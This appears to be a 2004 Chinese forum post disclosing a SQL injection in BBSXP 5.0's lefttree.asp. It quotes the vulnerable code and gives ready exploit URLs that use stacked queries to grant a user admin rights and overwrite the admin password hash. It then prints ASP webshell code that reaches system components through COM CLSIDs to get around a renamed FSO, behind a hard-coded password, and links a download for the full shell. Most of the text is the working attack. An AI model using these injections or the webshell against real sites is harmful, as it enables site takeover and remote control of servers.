移型换位之BBSXP5.0
===========================[ 移型换位 之 BBSXP5.0 ]==================漏洞发现者: xiaolu([email]web@666w.cn[/email]) 13K([email]13_k@163.com[/email])
所影响版本: BBSXP5.0 SQL/ACCESS
日期:2004.5.1 [url]www.666W.COM[/url] [url]www.SHJSAFE.COM[/url]
==============[ 1. 前言 ]============================================
-_-"" 今天是5·1劳动节,好无聊吖..先祝大家大家劳动节快乐.....
太无聊了..在朋友一个论坛上灌水,朋友让我检测他论坛的安全.....
好吧,看了一下,是BBSXP5.0的.就去下载个来看看....
======================================[ 1. 内容 ]====================
看代码中..........
(没想到,有个这么**的问题,程序员们该反省反省了,写此篇文章,没什么技术可言,只是想提醒一下程序员们,不要太懒了
CODE:
lefttree.asp
<!-- #include file="setup.asp" -->
<%
if Request("menu")="menu" then
sql="Select * From menu where followid="&Request("id")&" order by SortNum"
Set Rs1=Conn.Execute(sql)
do while not rs1.eof
[Copy to clipboard]
嘿嘿.看到了没? 是多么多么的无聊.........
=======================[ 1. 利用 ]===================================
OK.Let's go..
CODE:
[url]http://www.host.com/LeftTree.asp?menu=menu&id=1;update[/url] [user] set membercode=5 where username='fuck'--
[url]http://www.host.net/LeftTree.asp?menu=menu&id=1;update[/url] clubconfig set adminpassword='A64D84237507262182B4B902A5EDC35B'--
[Copy to clipboard]
OK.
user:fuck
pass:xiaoxue
"A64D84237507262182B4B902A5EDC35B"是32位的MD5加密.
进入后台..嘿嘿.搞个webshell吖..恩.传上去....吖!!!!! FSO被改名字了..555555
不好玩了..得想个办法解决它....OK.有了!
用object,挖哈哈.....搞定,搞定........
试了一下,他们没改clsid.只要clsid没改就能运行...代码如下:
CODE:
<%@ LANGUAGE = VBscript.Encode codepage ="936" %>
<%Server.scriptTimeOut=5000%>
<object runat=server id=oscript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat=server id=oscriptNet scope=page classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"></object>
<object runat=server id=oFileSys scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%
'on error resume next
httpt = Request.ServerVariables("server_name")
rseb=Request.ServerVariables("script_NAME")
q=request("q")
if q="" then q=rseb
select case q
case rseb
if Epass(trim(request.form("password")))="fuckfuck" then
response.cookies("password")="7758521"
response.redirect rseb & "?q=list.asp"
else %>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
</head>
<body>
<%if request.form("password")<>"" then
response.write "Password Error!"
end if
%>
<table border="1" width="100%" height="89" bgcolor="#DFDFFF" cellpadding="3"
bordercolorlight="#000000" bordercolordark="#F2F2F9" cellspacing="0">
<tr>
<td width="100%" height="31" bgcolor="#000080"><p align="center"><font color="#FFFFFF"><%=httpt%></font></td>
</tr>
<tr>
<td width="100%" height="46"><form method="POST" action="<%=rseb%>?q=<%=rseb%>">
<div align="center"><center><p>Enter Password:<input type="password" name="password"
size="20"
style="border-left: thin none; border-right: thin none; border-top: thin outset; border-bottom: thin outset">
<input type="submit" value="OK!LOGIN" name="B1"
style="font-size: 9pt; border: thin outset"></p>
</center></div>
</form>
</td>
</tr>
</table>
</body>
</html>
<%end if%>
[Copy to clipboard]
省略了......
完整的代码下载地址为:
[url]http://soft.666w.com/tools/gif.rar[/url]
呵....解决问题,可以继续延伸了.......
=======================[ 1. 结束 ]===================================
可以利用这些拿到更高的权限,嘿嘿.. ACCESS版的,只可以拿到MD5加密后的Password..
OK...完事了..继续无聊去....路子,我们走,咱哥俩喝酒解闷去......GO GO GO
页:
[1]